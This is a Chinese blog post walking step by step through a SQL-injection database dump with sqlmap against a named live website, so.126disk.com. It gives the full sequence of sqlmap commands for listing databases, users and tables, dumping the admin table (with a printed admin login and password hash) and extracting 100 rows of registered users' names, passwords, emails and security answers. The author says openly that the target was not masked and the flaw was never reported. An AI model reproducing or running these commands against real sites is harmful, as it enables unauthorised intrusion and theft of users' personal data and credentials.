SQLMAP注入拖库过程
http://hi.baidu.com/betafish/item/8be96093cc2a8aab82d2953c
SQLMAP注入拖库过程
--冰锋刺客
SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据。我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满意的。
渗透开始-->
注入点: "http://so.126disk.com/search?key=A"
测试环境: BackTrack 5 / SQLMAP 0.9
#> ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --dbs
// 列举数据库 --> 126disk , information_schema
#> ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --current-db
// 当前数据库 --> 126disk
#>./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --users
// 列数据库用户
#> ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --current-user
// 当前用户
#> ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --tables -D "126disk"
// 列举数据库126disk的表名
获取表名
+---------------------+
disk_admin
disk_adminlog
disk_adminmsg
disk_collection
disk_count
disk_file
disk_gonggao
disk_guolv
disk_haoyou
disk_integral
disk_integrallog
disk_jubao
disk_link
disk_links
disk_message
disk_mulu
disk_search
disk_server
disk_tag
disk_type
disk_user
disk_userlog
disk_visitors
disk_zhuanji
+----------------------+
#> ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --columns -T "disk_admin" -D "126disk"
// 获取表disk_admin的列名
#>./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --dump -C "id,login,pass,user" -T "disk_admin" -D "126disk"
// 获取表disk_admin中的数据,包含列 id,login,pass,user --> 1|9|admin|8e8df10cbce2ef46c3d25c3a5f7fe159
#> ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --columns -T "disk_user" -D "126disk"
// 获取表disk_user的列名
当看到这些列名时,心中是莫名的激动。里面可都是注册用户的数据啊
#>./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --dump -C "id,name,pass,email,wenti,daan" -T "disk_user" -D "126disk" --start 1 --stop 100
// 获取表disk_user的前100条数据,包含id,name,pass,email,wenti,daan;这里已经开始拖库了
SQLMAP是非常人性化的,它会将获取的数据存储在/pentest/web/scanners/sqlmap/output/so.126disk.com/dump/126disk/
补充: 在获取数据的过程中会询问是否破解HASH密码,这里选择n,我们不急于破解密文
[+]---------------------------------------------------------------------------------------------------------------[+]
参考资料:
[+]---------------------------------------------------------------------------------------------------------------[+]
注: 本文没打什么马赛克,因为本人有去查找126网盘的联系方式 想将漏洞情况同时反馈给126网盘去修补,但遗憾的是偌大的126网盘根本没有提供任何联系,我只能说抱歉了
SQLMAP注入拖库过程相关推荐
- 即使被拖库,也可以保证密码不泄露
转自:http://blog.coderzh.com/2016/01/10/a-password-security-design-example/ 在前一篇文章<设计安全的账号系统的正确姿势&g ...
- SQLMAP注入教程-11种常见SQLMAP使用方法
一.SQLMAP用于Access数据库注入 (1)猜解是否能注入 win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.a ...
- 数据安全 | 黑产研究之拖库
前言 通常web业务的重要数据诸如账户.交易信息都会存储在数据库中,这也使得数据库成为黑产攻击的重要目标.所谓拖库,就是通过入侵网站,非法获取数据库内容.本文将从黑产的动机.常见手段和如何防范三个角度 ...
- 从12306信息泄露了解何为黑客撞库拖库洗库
12月24日,漏洞报告平台乌云网出现了一则关于中国铁路购票网站12306的漏洞报告,危害等级显示为"高",漏洞类型则是"用户资料大量泄漏".据悉,此漏洞将有可能 ...
- (13)web安全|渗透测试|网络安全 注入/跨库查询/文件读写/常见的防护原理 详细图解
目录 高权限注入及低权限注入 跨库查询: 文件读写操作 流程: 找路径: 方法一: 方法二: 方法三: 方法四: 方法五: 方法六: 方法七: 知道路径后,再执行文件的读写操作 文件的写入: 可能遇到 ...
- sqlmap注入——POST检测点方法
目录 一.题目 二.解题过程 1. 在输入框输入`'`号,发现有错误提示,说明存在sql注入 2. 判断注入方式 3. sqlmap注入--POST检测点 4.sqlmap注入获取数据库信息 5.查看 ...
- 从Web日志还原SQL注入拖走的数据
利用SQL注入漏洞拖库,从而导致数据泄漏.一般的排查方式,我们可以使用关键字进行搜索,找到可疑的url尝试进行漏洞复现,通过Web访问日志来还原攻击路径,从而确定问题的根源. 但是,有一个问题却一直困 ...
- SQL注入语义分析库libinjection
文章目录 SQL注入语义分析库libinjection 什么是libinjection libinjection和正则表达式 modsecurity 如何使用libinjection ModSecur ...
- 只需使用这一招式,即可让黑客撞库、拖库等武功作废!
一.传统用户账号管理.使用痛点概述. 互联网发展繁荣,每个人都会在许多的网站.APP注册账号.由于网站和APP众多,这就导致了很多人使用同样的用户名和密码作为账号数据.一旦某个网站的数据泄露出去,就会 ...
- 由拖库攻击谈口令字段的加密策略
原文地址:由拖库攻击谈口令字段的加密策略 我不得不惨痛地写在前面的是,这是一个安全崩盘的时代.过去一年,已经证实的遭遇入侵.并导致关键数据被窃或者被泄露的公司,包括索尼.世嘉这样的大型游戏设备厂商:包 ...
最新文章
- RxJava2 / RxAndroid2的merge操作合并多个Observable
- golang中的strings.Compare
- 利用Diferencia和Java微服务进行分接比较测试
- Git常用操作命令----有备无患
- VTK:网格之CapClip
- 专接本汇编开发工具【Masm for Winodws 集成实验环境】安装细则
- Symbian学习笔记(4)——在GUI应用中使用图像
- Trial SCN WebIDE版本下载
- 常见SQL Server 2000漏洞及其相关利用2
- python里default_新手对python default不是很理解它有什么用途
- 计算机大赛软件应用与开发,我院学生在2019年中国大学生计算机设计大赛“软件应用与开发”决赛中荣获佳绩...
- 怎样才算精通javascript
- Unity3d-模型描边和混色Shader
- 小飞鱼通达二开 通达OA集成企业微信扫码登录的开发(图文)
- 清空RMON统计的数据
- DFRobot行业AI开发者大赛--LattePandaDelta
- 亲测3种个人在线网站建设的方法
- 结构体 — C 语言中不定长结构体的使用
- QIIME2使用方法
- Elastalert的报警功能拓展:分组报警